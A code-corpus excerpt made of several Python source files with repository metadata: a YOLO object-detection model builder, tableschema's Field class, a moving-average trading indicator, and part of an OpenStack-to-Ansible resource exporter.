    thop = None  # thop is optional; profiling then reports 0 FLOPS
class Detect(nn.Module):
    """YOLO detection head: a 1x1 conv per feature level producing, per
    anchor, (x, y, w, h, objectness, class scores)."""
    stride = None  # strides computed during build
    export = False  # onnx export

    def __init__(self, nc=80, anchors=(), ch=()):  # detection layer
        super(Detect, self).__init__()
        self.nc = nc  # number of classes
        self.no = nc + 5  # number of outputs per anchor
        self.nl = len(anchors)  # number of detection layers
        self.na = len(anchors[0]) // 2  # number of anchors
        self.grid = [torch.zeros(1)] * self.nl  # init grid
        a = torch.tensor(anchors).float().view(self.nl, -1, 2)
        self.register_buffer('anchors', a)  # shape(nl,na,2)
        self.register_buffer('anchor_grid', a.clone().view(self.nl, 1, -1, 1, 1, 2))  # shape(nl,1,na,1,1,2)
        self.m = nn.ModuleList(nn.Conv2d(x, self.no * self.na, 1) for x in ch)  # output conv

    def forward(self, x):
        """x: list of self.nl feature maps. In training mode returns the raw
        per-level tensors; in inference mode also decodes boxes to image space
        and returns (decoded predictions, raw tensors)."""
        # x = x.copy()  # for profiling
        z = []  # inference output
        self.training |= self.export
        for i in range(self.nl):
            x[i] = self.m[i](x[i])  # conv
            bs, _, ny, nx = x[i].shape  # x(bs,255,20,20) to x(bs,3,20,20,85)
            x[i] = x[i].view(bs, self.na, self.no, ny, nx).permute(0, 1, 3, 4, 2).contiguous()

            if not self.training:  # inference
                # Rebuild the cell-coordinate grid only when the map size changed.
                if self.grid[i].shape[2:4] != x[i].shape[2:4]:
                    self.grid[i] = self._make_grid(nx, ny).to(x[i].device)

                y = x[i].sigmoid()
                # Decode: xy as offsets relative to the cell grid scaled by the
                # level stride; wh as (2*sigmoid)^2 times the anchor size.
                y[..., 0:2] = (y[..., 0:2] * 2. - 0.5 + self.grid[i]) * self.stride[i]  # xy
                y[..., 2:4] = (y[..., 2:4] * 2) ** 2 * self.anchor_grid[i]  # wh
                z.append(y.view(bs, -1, self.no))

        return x if self.training else (torch.cat(z, 1), x)

    @staticmethod
    def _make_grid(nx=20, ny=20):
        # (1, 1, ny, nx, 2) tensor holding the (x, y) coordinate of every cell.
        yv, xv = torch.meshgrid([torch.arange(ny), torch.arange(nx)])
        return torch.stack((xv, yv), 2).view((1, 1, ny, nx, 2)).float()
class Model(nn.Module):
    """Full YOLO model assembled from a YAML config (backbone + head + Detect)."""

    def __init__(self, cfg='yolov3.yaml', ch=3, nc=None, anchors=None):  # model, input channels, number of classes
        super(Model, self).__init__()
        if isinstance(cfg, dict):
            self.yaml = cfg  # model dict
        else:  # is *.yaml
            import yaml  # for torch hub
            self.yaml_file = Path(cfg).name
            with open(cfg) as f:
                self.yaml = yaml.load(f, Loader=yaml.SafeLoader)  # model dict

        # Define model
        ch = self.yaml['ch'] = self.yaml.get('ch', ch)  # input channels
        if nc and nc != self.yaml['nc']:
            logger.info(f"Overriding model.yaml nc={self.yaml['nc']} with nc={nc}")
            self.yaml['nc'] = nc  # override yaml value
        if anchors:
            logger.info(f'Overriding model.yaml anchors with anchors={anchors}')
            self.yaml['anchors'] = round(anchors)  # override yaml value
        self.model, self.save = parse_model(deepcopy(self.yaml), ch=[ch])  # model, savelist
        self.names = [str(i) for i in range(self.yaml['nc'])]  # default names
        # print([x.shape for x in self.forward(torch.zeros(1, ch, 64, 64))])

        # Build strides, anchors: run one dummy forward pass to measure each
        # detection level's downsampling factor, then normalize anchors by it.
        m = self.model[-1]  # Detect()
        if isinstance(m, Detect):
            s = 256  # 2x min stride
            m.stride = torch.tensor([s / x.shape[-2] for x in self.forward(torch.zeros(1, ch, s, s))])  # forward
            m.anchors /= m.stride.view(-1, 1, 1)
            check_anchor_order(m)
            self.stride = m.stride
            self._initialize_biases()  # only run once
            # print('Strides: %s' % m.stride.tolist())

        # Init weights, biases
        initialize_weights(self)
        self.info()
        logger.info('')

    def forward(self, x, augment=False, profile=False):
        """Run the model; with augment=True, combine predictions over scaled
        and flipped copies of the input (test-time augmentation)."""
        if augment:
            img_size = x.shape[-2:]  # height, width
            s = [1, 0.83, 0.67]  # scales
            f = [None, 3, None]  # flips (2-ud, 3-lr)
            y = []  # outputs
            for si, fi in zip(s, f):
                xi = scale_img(x.flip(fi) if fi else x, si, gs=int(self.stride.max()))
                yi = self.forward_once(xi)[0]  # forward
                # cv2.imwrite(f'img_{si}.jpg', 255 * xi[0].cpu().numpy().transpose((1, 2, 0))[:, :, ::-1]) # save
                yi[..., :4] /= si  # de-scale
                if fi == 2:
                    yi[..., 1] = img_size[0] - yi[..., 1]  # de-flip ud
                elif fi == 3:
                    yi[..., 0] = img_size[1] - yi[..., 0]  # de-flip lr
                y.append(yi)
            return torch.cat(y, 1), None  # augmented inference, train
        else:
            return self.forward_once(x, profile)  # single-scale inference, train

    def forward_once(self, x, profile=False):
        """Single pass through the layer list, feeding layers whose 'from'
        index is not -1 with earlier saved outputs."""
        y, dt = [], []  # outputs
        for m in self.model:
            if m.f != -1:  # if not from previous layer
                x = y[m.f] if isinstance(m.f, int) else [x if j == -1 else y[j] for j in m.f]  # from earlier layers

            if profile:
                o = thop.profile(m, inputs=(x,), verbose=False)[0] / 1E9 * 2 if thop else 0  # FLOPS
                t = time_synchronized()
                for _ in range(10):
                    _ = m(x)
                dt.append((time_synchronized() - t) * 100)
                print('%10.1f%10.0f%10.1fms %-40s' % (o, m.np, dt[-1], m.type))

            x = m(x)  # run
            y.append(x if m.i in self.save else None)  # save output

        if profile:
            print('%.1fms total' % sum(dt))
        return x

    def _initialize_biases(self, cf=None):  # initialize biases into Detect(), cf is class frequency
        # https://arxiv.org/abs/1708.02002 section 3.3
        # cf = torch.bincount(torch.tensor(np.concatenate(dataset.labels, 0)[:, 0]).long(), minlength=nc) + 1.
        m = self.model[-1]  # Detect() module
        for mi, s in zip(m.m, m.stride):  # from
            b = mi.bias.view(m.na, -1)  # conv.bias(255) to (3,85)
            b.data[:, 4] += math.log(8 / (640 / s) ** 2)  # obj (8 objects per 640 image)
            b.data[:, 5:] += math.log(0.6 / (m.nc - 0.99)) if cf is None else torch.log(cf / cf.sum())  # cls
            mi.bias = torch.nn.Parameter(b.view(-1), requires_grad=True)

    def _print_biases(self):
        # Debug helper: print the mean detection-head biases per level.
        m = self.model[-1]  # Detect() module
        for mi in m.m:  # from
            b = mi.bias.detach().view(m.na, -1).T  # conv.bias(255) to (3,85)
            print(('%6g Conv2d.bias:' + '%10.3g' * 6) % (mi.weight.shape[1], *b[:5].mean(1).tolist(), b[5:].mean()))

    # def _print_weights(self):
    #     for m in self.model.modules():
    #         if type(m) is Bottleneck:
    #             print('%10.3g' % (m.w.detach().sigmoid() * 2))  # shortcut weights

    def fuse(self):  # fuse model Conv2d() + BatchNorm2d() layers
        print('Fusing layers... ')
        for m in self.model.modules():
            if type(m) is Conv and hasattr(m, 'bn'):
                m.conv = fuse_conv_and_bn(m.conv, m.bn)  # update conv
                delattr(m, 'bn')  # remove batchnorm
                m.forward = m.fuseforward  # update forward
        self.info()
        return self

    def nms(self, mode=True):  # add or remove NMS module
        present = type(self.model[-1]) is NMS  # last layer is NMS
        if mode and not present:
            print('Adding NMS... ')
            m = NMS()  # module
            m.f = -1  # from
            m.i = self.model[-1].i + 1  # index
            self.model.add_module(name='%s' % m.i, module=m)  # add
            self.eval()
        elif not mode and present:
            print('Removing NMS... ')
            self.model = self.model[:-1]  # remove
        return self

    def autoshape(self):  # add autoShape module
        print('Adding autoShape... ')
        m = autoShape(self)  # wrap model
        copy_attr(m, self, include=('yaml', 'nc', 'hyp', 'names', 'stride'), exclude=())  # copy attributes
        return m

    def info(self, verbose=False, img_size=640):  # print model information
        model_info(self, verbose, img_size)
def parse_model(d, ch):  # model_dict, input_channels(3)
    """Translate the YAML model dict into an nn.Sequential, returning it plus
    the sorted list of layer indices whose outputs must be cached because a
    later layer references them via its 'from' field.

    NOTE: eval() below executes text taken from the model YAML, so the config
    file must be trusted.
    """
    logger.info('\n%3s%18s%3s%10s %-40s%-30s' % ('', 'from', 'n', 'params', 'module', 'arguments'))
    anchors, nc, gd, gw = d['anchors'], d['nc'], d['depth_multiple'], d['width_multiple']
    na = (len(anchors[0]) // 2) if isinstance(anchors, list) else anchors  # number of anchors
    no = na * (nc + 5)  # number of outputs = anchors * (classes + 5)

    layers, save, c2 = [], [], ch[-1]  # layers, savelist, ch out
    for i, (f, n, m, args) in enumerate(d['backbone'] + d['head']):  # from, number, module, args
        m = eval(m) if isinstance(m, str) else m  # eval strings
        for j, a in enumerate(args):
            try:
                args[j] = eval(a) if isinstance(a, str) else a  # eval strings
            except:
                pass

        n = max(round(n * gd), 1) if n > 1 else n  # depth gain
        if m in [Conv, GhostConv, Bottleneck, GhostBottleneck, SPP, DWConv, MixConv2d, Focus, CrossConv, BottleneckCSP,
                 C3, C3TR]:
            c1, c2 = ch[f], args[0]
            if c2 != no:  # if not output
                c2 = make_divisible(c2 * gw, 8)

            args = [c1, c2, *args[1:]]
            if m in [BottleneckCSP, C3, C3TR]:
                args.insert(2, n)  # number of repeats
                n = 1
        elif m is nn.BatchNorm2d:
            args = [ch[f]]
        elif m is Concat:
            c2 = sum([ch[x] for x in f])
        elif m is Detect:
            args.append([ch[x] for x in f])
            if isinstance(args[1], int):  # number of anchors
                args[1] = [list(range(args[1] * 2))] * len(f)
        elif m is Contract:
            c2 = ch[f] * args[0] ** 2
        elif m is Expand:
            c2 = ch[f] // args[0] ** 2
        else:
            c2 = ch[f]

        m_ = nn.Sequential(*[m(*args) for _ in range(n)]) if n > 1 else m(*args)  # module
        t = str(m)[8:-2].replace('__main__.', '')  # module type
        np = sum([x.numel() for x in m_.parameters()])  # number params
        m_.i, m_.f, m_.type, m_.np = i, f, t, np  # attach index, 'from' index, type, number params
        logger.info('%3s%18s%3s%10.0f %-40s%-30s' % (i, f, n, np, t, args))  # print
        save.extend(x % i for x in ([f] if isinstance(f, int) else f) if x != -1)  # append to savelist
        layers.append(m_)
        if i == 0:
            ch = []
        ch.append(c2)
    return nn.Sequential(*layers), sorted(save)
if __name__ == '__main__':
    # CLI smoke test: build the model described by --cfg on --device and leave
    # it in train mode. The commented sections are optional profiling and
    # TensorBoard helpers.
    parser = argparse.ArgumentParser()
    parser.add_argument('--cfg', type=str, default='yolov3.yaml', help='model.yaml')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    opt = parser.parse_args()
    opt.cfg = check_file(opt.cfg)  # check file
    set_logging()
    device = select_device(opt.device)

    # Create model
    model = Model(opt.cfg).to(device)
    model.train()

    # Profile
    # img = torch.rand(8 if torch.cuda.is_available() else 1, 3, 640, 640).to(device)
    # y = model(img, profile=True)

    # Tensorboard
    # from torch.utils.tensorboard import SummaryWriter
    # tb_writer = SummaryWriter()
    # print("Run 'tensorboard --logdir=models/runs' to view tensorboard at http://localhost:6006/")
    # tb_writer.add_graph(model.model, img)  # add model to tensorboard
    # tb_writer.add_image('test', img[0], dataformats='CWH')  # add model to tensorboard
f1a4679219df22cbbd18651f28bec702894cf767 | 6,363 | py | Python | tableschema/field.py | theotheo/tableschema-py | f308b48ce7d185d82a4a958830db190701abb7d0 | [
"MIT"
] | null | null | null | tableschema/field.py | theotheo/tableschema-py | f308b48ce7d185d82a4a958830db190701abb7d0 | [
"MIT"
] | null | null | null | tableschema/field.py | theotheo/tableschema-py | f308b48ce7d185d82a4a958830db190701abb7d0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from functools import partial
from .profile import Profile
from . import constraints
from . import exceptions
from . import helpers
from . import config
from . import types
# Module API
class Field(object):
    """Field representation

    # Arguments
        descriptor (dict): schema field descriptor
        missingValues (str[]): an array with string representing missing values

    # Raises
        TableSchemaException: raises any error that occurs during the process

    """

    # Public

    def __init__(self, descriptor, missing_values=config.DEFAULT_MISSING_VALUES,
                 # Internal
                 schema=None):

        # Process descriptor: fill in defaults such as type/format.
        descriptor = helpers.expand_field_descriptor(descriptor)

        # Set attributes (cast/check callables are derived once, up front).
        self.__descriptor = descriptor
        self.__missing_values = missing_values
        self.__schema = schema
        self.__cast_function = self.__get_cast_function()
        self.__check_functions = self.__get_check_functions()

    @property
    def schema(self):
        """Returns a schema instance if the field belongs to some schema

        # Returns
            Schema: field's schema

        """
        return self.__schema

    @property
    def name(self):
        """Field name

        # Returns
            str: field name

        """
        return self.__descriptor.get('name')

    @property
    def type(self):
        """Field type

        # Returns
            str: field type

        """
        return self.__descriptor.get('type')

    @property
    def format(self):
        """Field format

        # Returns
            str: field format

        """
        return self.__descriptor.get('format')

    @property
    def required(self):
        """Whether field is required

        # Returns
            bool: true if required

        """
        return self.constraints.get('required', False)

    @property
    def constraints(self):
        """Field constraints

        # Returns
            dict: dict of field constraints

        """
        return self.__descriptor.get('constraints', {})

    @property
    def descriptor(self):
        """Fields's descriptor

        # Returns
            dict: descriptor

        """
        return self.__descriptor

    def cast_value(self, value, constraints=True, preserve_missing_values=False):
        """Cast given value according to the field type and format.

        # Arguments
            value (any): value to cast against field
            constraints (bool/str[]): constraints configuration
                - it could be set to false to disable constraint checks
                - it could be an Array of constraints to check e.g. ['minimum', 'maximum']

        # Raises
            TableSchemaException: raises any error that occurs during the process

        # Returns
            any: returns cast value

        """

        # Null value: values matching the configured missing values cast to None.
        if value in self.__missing_values:
            # If missing_values should be preserved without being cast
            if preserve_missing_values:
                return value
            value = None

        # Cast value; types.cast_* return the config.ERROR sentinel on failure.
        cast_value = value
        if value is not None:
            cast_value = self.__cast_function(value)
            if cast_value == config.ERROR:
                raise exceptions.CastError((
                    'Field "{field.name}" can\'t cast value "{value}" '
                    'for type "{field.type}" with format "{field.format}"'
                ).format(field=self, value=value))

        # Check value against constraints (all of them, or only the listed ones).
        if constraints:
            for name, check in self.__check_functions.items():
                if isinstance(constraints, list):
                    if name not in constraints:
                        continue
                passed = check(cast_value)
                if not passed:
                    raise exceptions.CastError((
                        'Field "{field.name}" has constraint "{name}" '
                        'which is not satisfied for value "{value}"'
                    ).format(field=self, name=name, value=value))

        return cast_value

    def test_value(self, value, constraints=True):
        """Test whether value is compliant to the field.

        # Arguments
            value (any): value to cast against field
            constraints (bool/str[]): constraints configuration

        # Returns
            bool: returns if value is compliant to the field

        """
        try:
            self.cast_value(value, constraints=constraints)
        except exceptions.CastError:
            return False
        return True

    # Private

    def __get_cast_function(self):
        # Build a partial of types.cast_<type>(format, **options) from the
        # cast-related keys present in the descriptor.
        options = {}
        # Get cast options
        for key in ['decimalChar', 'groupChar', 'bareNumber', 'trueValues', 'falseValues']:
            value = self.descriptor.get(key)
            if value is not None:
                options[key] = value
        cast = getattr(types, 'cast_%s' % self.type)
        cast = partial(cast, self.format, **options)
        return cast

    def __get_check_functions(self):
        # Map constraint name -> partial of constraints.check_<name>(constraint),
        # pre-casting constraint values so checks compare like with like.
        checks = {}
        cast = partial(self.cast_value, constraints=False)
        whitelist = _get_field_constraints(self.type)
        for name, constraint in self.constraints.items():
            if name in whitelist:
                # Cast enum constraint
                if name in ['enum']:
                    constraint = list(map(cast, constraint))
                # Cast maximum/minimum constraint
                if name in ['maximum', 'minimum']:
                    constraint = cast(constraint)
                check = getattr(constraints, 'check_%s' % name)
                checks[name] = partial(check, constraint)
        return checks
# Internal
def _get_field_constraints(type):
    """Look up the constraint names the Table Schema profile allows for *type*.

    Returns None when no profile entry matches the given type.
    """
    schema = Profile('table-schema').jsonschema
    candidates = schema['properties']['fields']['items']['anyOf']
    matches = (
        entry['properties']['constraints']['properties'].keys()
        for entry in candidates
        if type in entry['properties']['type']['enum']
    )
    return next(matches, None)
| 28.791855 | 91 | 0.583687 |
f6d93bd85c04ce266158b03facdb42e14b1490c5 | 1,531 | py | Python | indicators.py | guibuenorodrigues/robot-trader | 2fdf59870a1f3435a7697b521701df70f3aaebb2 | [
"MIT"
] | null | null | null | indicators.py | guibuenorodrigues/robot-trader | 2fdf59870a1f3435a7697b521701df70f3aaebb2 | [
"MIT"
] | null | null | null | indicators.py | guibuenorodrigues/robot-trader | 2fdf59870a1f3435a7697b521701df70f3aaebb2 | [
"MIT"
] | 1 | 2021-12-08T03:43:28.000Z | 2021-12-08T03:43:28.000Z | import logging
from typing import Tuple
from numpy.lib.function_base import average
import pandas as pd
import math
from ticker import Ticker
class Indicators:
    """Accumulates ticks and computes simple moving averages over a short
    ("low") and a long ("high") window."""

    def __init__(self) -> None:
        self.logger = logging.getLogger(__name__)
        # Raw value history for each average (both receive every tick).
        self.averages_low = []
        self.averages_high = []
        # Window sizes; set on the first add_value_to_move_average_data() call.
        self.average_period_low = 0
        self.average_period_high = 0

    def add_value_to_move_average_data(self, last: float, period: list):
        """Record a new tick and refresh the short/long window sizes.

        :param last: latest observed value.
        :param period: list of window sizes; min() becomes the "low" period
            and max() the "high" period.
        """
        self.average_period_low = min(period)
        self.average_period_high = max(period)
        self.averages_low.append(last)
        self.averages_high.append(last)

    def calculate_simple_move_average(self, kind: str = 'low') -> Tuple:
        """Return (previous SMA, current SMA) for the requested window.

        Either value is 0 while not enough samples have been collected to
        fill the corresponding rolling window.
        """
        if kind == 'low':
            period = self.average_period_low
            averages = self.averages_low
        else:
            period = self.average_period_high
            averages = self.averages_high

        moving_averages_list = pd.Series(averages).rolling(period).mean().tolist()
        n = len(moving_averages_list)
        # Bug fix: the previous value needs period + 1 samples. The original
        # guarded both values with `n >= period`, which returned NaN for the
        # previous SMA when exactly `period` samples existed and raised
        # IndexError for period == 1 with a single sample.
        sma_previous = moving_averages_list[-2] if n >= period + 1 else 0
        sma_current = moving_averages_list[-1] if n >= period else 0
        return sma_previous, sma_current

    def __index_in_list(self, a_list: list, index: int) -> bool:
        """Return True when *index* is a valid position in *a_list*."""
        # Bug fix: removed a leftover debug print() of the result.
        return index < len(a_list)
| 27.836364 | 93 | 0.646636 |
f5f50f34c77949680bf36dff3e1d919a9d8f995b | 30,855 | py | Python | openstack_ansible/openstack_ansible.py | jfrancoa/os-migrate | 3c48ef8f5a42edf5d0afd20b8fea969b287f8b46 | [
"Apache-2.0"
] | null | null | null | openstack_ansible/openstack_ansible.py | jfrancoa/os-migrate | 3c48ef8f5a42edf5d0afd20b8fea969b287f8b46 | [
"Apache-2.0"
] | null | null | null | openstack_ansible/openstack_ansible.py | jfrancoa/os-migrate | 3c48ef8f5a42edf5d0afd20b8fea969b287f8b46 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
import os
import openstack
from plugins.os_ansible import config as conf
from plugins.os_ansible import const
from plugins.os_ansible.common import value, optimize, write_yaml
class OpenstackAnsible:
def __init__(self, cloud_name, debug=False):
self.debug = debug
self.data = {}
self.stor_path = None
self.net_path = None
self.comp_path = None
self.iden_path = None
self.cloud = cloud_name
self.get_info()
def run(self):
self.initialize_directories()
if conf.DUMP_NETWORKS:
self.dump_networks()
if conf.DUMP_STORAGE:
self.dump_storage()
if conf.DUMP_SERVERS:
self.dump_servers()
if conf.DUMP_IDENTITY:
self.dump_identity()
self.write_playbook()
    def get_info(self):
        """Connect to the cloud named ``self.cloud`` and cache lists of raw
        SDK resource objects in ``self.data``, keyed by resource type.
        Only the sections enabled by the conf.DUMP_* flags are fetched;
        list() materializes the SDK generators so they can be re-read later.
        """
        conn = openstack.connect(cloud=self.cloud)
        # pylint: disable=maybe-no-member
        if self.debug:
            openstack.enable_logging(debug=True)
        if conf.DUMP_NETWORKS:
            self.data['networks'] = list(conn.network.networks())
            self.data['subnets'] = list(conn.network.subnets())
            self.data['secgroups'] = list(conn.network.security_groups())
            self.data['routers'] = list(conn.network.routers())
            self.data['ports'] = list(conn.network.ports())
        if conf.DUMP_STORAGE:
            self.data['images'] = list(conn.image.images())
            self.data['volumes'] = list(conn.volume.volumes())
        if conf.DUMP_SERVERS:
            self.data['servers'] = list(conn.compute.servers())
            self.data['keypairs'] = list(conn.compute.keypairs())
            self.data['flavors'] = list(conn.compute.flavors())
        if conf.DUMP_IDENTITY:
            self.data['users'] = list(conn.identity.users())
            self.data['domains'] = list(conn.identity.domains())
            self.data['projects'] = list(conn.identity.projects())
def initialize_directories(self):
if not os.path.exists(conf.PLAYS):
os.makedirs(conf.PLAYS)
if not os.path.exists(os.path.dirname(conf.VARS_PATH)):
os.makedirs(os.path.dirname(conf.VARS_PATH))
with open(conf.VARS_PATH, "w") as e:
e.write("---\n")
if conf.DUMP_NETWORKS:
self.net_path = os.path.join(conf.PLAYS, "networks")
if not os.path.exists(self.net_path):
os.makedirs(self.net_path)
if conf.DUMP_STORAGE:
self.stor_path = os.path.join(conf.PLAYS, "storage")
if not os.path.exists(self.stor_path):
os.makedirs(self.stor_path)
if conf.DUMP_SERVERS:
self.comp_path = os.path.join(conf.PLAYS, "compute")
if not os.path.exists(self.comp_path):
os.makedirs(self.comp_path)
if conf.DUMP_IDENTITY:
self.iden_path = os.path.join(conf.PLAYS, "identity")
if not os.path.exists(self.iden_path):
os.makedirs(self.iden_path)
def dump_networks(self):
net_funcs = {
const.FILE_NETWORKS: self.create_networks,
const.FILE_SUBNETS: self.create_subnets,
const.FILE_SECURITY_GROUPS: self.create_security_groups,
const.FILE_ROUTERS: self.create_routers,
}
for net_file, func in net_funcs.items():
path = os.path.join(self.net_path, net_file)
dumped_data = func(self.data)
write_yaml(dumped_data, path)
def dump_storage(self):
stor_funcs = {
const.FILE_IMAGES: self.create_images,
const.FILE_VOLUMES: self.create_volumes,
}
for stor_file, func in stor_funcs.items():
path = os.path.join(self.stor_path, stor_file)
dumped_data = func(self.data)
write_yaml(dumped_data, path)
def dump_servers(self):
comp_funcs = {
const.FILE_KEYPAIRS: self.create_keypairs,
const.FILE_SERVERS: self.create_servers,
const.FILE_FLAVORS: self.create_flavors,
}
for comp_file, func in comp_funcs.items():
path = os.path.join(self.comp_path, comp_file)
dumped_data = func(self.data)
write_yaml(dumped_data, path)
def dump_identity(self):
iden_funcs = {
const.FILE_USERS: self.create_users,
const.FILE_DOMAINS: self.create_domains,
const.FILE_PROJECTS: self.create_projects,
}
for iden_file, func in iden_funcs.items():
path = os.path.join(self.iden_path, iden_file)
dumped_data = func(self.data)
write_yaml(dumped_data, path)
def write_playbook(self):
playbook = const.PLAYBOOK
if conf.DUMP_NETWORKS:
playbook += const.NET_PLAYBOOK
if conf.DUMP_STORAGE:
playbook += const.STORAGE_PLAYBOOK
if conf.DUMP_SERVERS:
playbook += const.COMPUTE_PLAYBOOK
if conf.DUMP_IDENTITY:
playbook += const.IDENTITY_PLAYBOOK
with open(os.path.join(conf.PLAYS, "playbook.yml"), "w") as f:
f.write(playbook)
    def create_projects(self, data, force_optimize=conf.VARS_OPT_PROJECTS):
        """Build os_project Ansible task dicts from the dumped keystone projects.

        With force_optimize set, the per-item tasks are folded into one looped
        task via optimize(); otherwise one task per project is returned.
        NOTE(review): value() presumably filters out unset/default fields, so a
        False is_enabled would be skipped -- confirm against the helper.
        """
        projects = []
        pre_optimized = []
        for pro in data['projects']:
            p = {'state': 'present'}
            if pro.get('location') and pro['location'].get('cloud'):
                p['cloud'] = pro['location']['cloud']
            p['name'] = pro['name']
            if value(pro, 'project', 'is_enabled'):
                p['enabled'] = pro['is_enabled']
            if value(pro, 'project', 'description'):
                p['description'] = pro['description']
            if value(pro, 'project', 'domain_id'):
                p['domain_id'] = pro['domain_id']
            if force_optimize:
                pre_optimized.append({'os_project': p})
            else:
                projects.append({'os_project': p})
        if force_optimize:
            optimized = optimize(
                pre_optimized,
                var_name="projects")
            if optimized:
                projects.append(optimized)
        return projects
    def create_domains(self, data, force_optimize=conf.VARS_OPT_DOMAINS):
        """Build os_keystone_domain Ansible task dicts from the dumped domains.

        With force_optimize set, per-item tasks are folded into one looped
        task via optimize(); otherwise one task per domain is returned.
        """
        domains = []
        pre_optimized = []
        for dom in data['domains']:
            d = {'state': 'present'}
            if dom.get('location') and dom['location'].get('cloud'):
                d['cloud'] = dom['location']['cloud']
            d['name'] = dom['name']
            if value(dom, 'domain', 'is_enabled'):
                d['enabled'] = dom['is_enabled']
            if value(dom, 'domain', 'description'):
                d['description'] = dom['description']
            if force_optimize:
                pre_optimized.append({'os_keystone_domain': d})
            else:
                domains.append({'os_keystone_domain': d})
        if force_optimize:
            optimized = optimize(
                pre_optimized,
                var_name="domains")
            if optimized:
                domains.append(optimized)
        return domains
    def create_users(self, data, force_optimize=conf.VARS_OPT_USERS):
        """Build os_user Ansible task dicts from the dumped keystone users,
        resolving domain/project ids to names via lookup maps.

        NOTE(review): a user whose domain_id/default_project_id is missing from
        the dumped domains/projects would raise KeyError here -- confirm the
        dumps are always complete.
        """
        users = []
        pre_optimized = []
        # id -> name lookup tables built from the other identity dumps.
        domains_by_id = {d['id']: d['name'] for d in data['domains']}
        projects_by_id = {d['id']: d['name'] for d in data['projects']}
        for user in data['users']:
            u = {'state': 'present'}
            if user.get('location') and user['location'].get('cloud'):
                u['cloud'] = user['location']['cloud']
            u['name'] = user['name']
            if value(user, 'user', 'is_enabled'):
                u['enabled'] = user['is_enabled']
            if value(user, 'user', 'description'):
                u['description'] = user['description']
            if value(user, 'user', 'domain_id'):
                u['domain'] = domains_by_id[user['domain_id']]
            if value(user, 'user', 'default_project_id'):
                u['default_project'] = projects_by_id[user['default_project_id']]
            if value(user, 'user', 'email'):
                u['email'] = user['email']
            if value(user, 'user', 'password'):  # shouldn't be there
                u['password'] = user['password']
            if force_optimize:
                pre_optimized.append({'os_user': u})
            else:
                users.append({'os_user': u})
        if force_optimize:
            optimized = optimize(
                pre_optimized,
                var_name="users")
            if optimized:
                users.append(optimized)
        return users
    def create_flavors(self, data, force_optimize=conf.VARS_OPT_FLAVORS):
        """Build os_nova_flavor Ansible task dicts from the dumped flavors.

        With force_optimize set, per-item tasks are folded into one looped
        task via optimize(); otherwise one task per flavor is returned.
        """
        flavors = []
        pre_optimized = []
        for flavor in data['flavors']:
            fl = {'state': 'present'}
            if flavor.get('location') and flavor['location'].get('cloud'):
                fl['cloud'] = flavor['location']['cloud']
            fl['name'] = flavor['name']
            if value(flavor, 'flavor', 'disk'):
                fl['disk'] = flavor['disk']
            if value(flavor, 'flavor', 'ram'):
                fl['ram'] = flavor['ram']
            if value(flavor, 'flavor', 'vcpus'):
                fl['vcpus'] = flavor['vcpus']
            if value(flavor, 'flavor', 'swap'):
                fl['swap'] = flavor['swap']
            if value(flavor, 'flavor', 'rxtx_factor'):
                fl['rxtx_factor'] = flavor['rxtx_factor']
            if value(flavor, 'flavor', 'is_public'):
                fl['is_public'] = flavor['is_public']
            if value(flavor, 'flavor', 'ephemeral'):
                fl['ephemeral'] = flavor['ephemeral']
            if value(flavor, 'flavor', 'extra_specs'):
                fl['extra_specs'] = flavor['extra_specs']
            if force_optimize:
                pre_optimized.append({'os_nova_flavor': fl})
            else:
                flavors.append({'os_nova_flavor': fl})
        if force_optimize:
            optimized = optimize(
                pre_optimized,
                var_name="flavors")
            if optimized:
                flavors.append(optimized)
        return flavors
def create_subnets(self, data, force_optimize=conf.VARS_OPT_SUBNETS):
    """Build one `os_subnet` Ansible task per subnet in the dump.

    Subnets whose parent network is missing from the dump are reported
    on stdout and skipped.

    :param data: dump dict containing ``subnets`` and ``networks`` lists.
    :param force_optimize: collapse the tasks into an optimized variable
        block named ``subnets``.
    :returns: list of Ansible task dicts (optionally optimized).
    """
    tasks = []
    staged = []
    network_names = {net['id']: net['name'] for net in data['networks']}
    for subnet in data['subnets']:
        entry = {'state': 'present'}
        location = subnet.get('location') or {}
        if location.get('cloud'):
            entry['cloud'] = location['cloud']
        entry['name'] = subnet['name']
        net_id = subnet['network_id']
        if net_id not in network_names:
            print("subnet %s id=%s doesn't find its network id=%s" %
                  (subnet['name'], subnet['id'], net_id))
            continue
        entry['network_name'] = network_names[net_id]
        entry['cidr'] = subnet['cidr']
        if value(subnet, 'subnet', 'ip_version'):
            entry['ip_version'] = subnet['ip_version']
        # NB: exported as `enable_dhcp` but sourced from the SDK
        # attribute `is_dhcp_enabled`.
        if value(subnet, 'subnet', 'enable_dhcp'):
            entry['enable_dhcp'] = subnet['is_dhcp_enabled']
        for key in ('gateway_ip', 'dns_nameservers', 'ipv6_address_mode',
                    'ipv6_ra_mode', 'host_routes'):
            if value(subnet, 'subnet', key):
                entry[key] = subnet[key]
        if force_optimize:
            staged.append({'os_subnet': entry})
        else:
            tasks.append({'os_subnet': entry})
    if force_optimize:
        optimized = optimize(
            staged,
            var_name="subnets")
        if optimized:
            tasks.append(optimized)
    return tasks
def create_networks(self, data, force_optimize=conf.VARS_OPT_NETWORKS):
    """Build one `os_network` Ansible task per network in the dump.

    :param data: dump dict containing a ``networks`` list.
    :param force_optimize: collapse the tasks into an optimized variable
        block named ``networks``.
    :returns: list of Ansible task dicts (optionally optimized).
    """
    tasks = []
    staged = []
    # (dump attribute, ansible parameter) pairs, copied when `value()`
    # approves them; order matters for the rendered playbook.
    field_map = (
        ('is_admin_state_up', 'admin_state_up'),
        ('is_router_external', 'external'),
        ('is_port_security_enabled', 'port_security_enabled'),
        ('is_shared', 'shared'),
        ('provider_network_type', 'provider_network_type'),
        ('provider_physical_network', 'provider_physical_network'),
        ('provider_segmentation_id', 'provider_segmentation_id'),
        # 'mtu' is intentionally not exported (kept disabled upstream).
        ('dns_domain', 'dns_domain'),
    )
    for network in data['networks']:
        entry = {'state': 'present'}
        location = network.get('location') or {}
        if location.get('cloud'):
            entry['cloud'] = location['cloud']
        entry['name'] = network['name']
        for src, dst in field_map:
            if value(network, 'network', src):
                entry[dst] = network[src]
        if force_optimize:
            staged.append({'os_network': entry})
        else:
            tasks.append({'os_network': entry})
    if force_optimize:
        optimized = optimize(
            staged,
            var_name="networks")
        if optimized:
            tasks.append(optimized)
    return tasks
def create_security_groups(self, data,
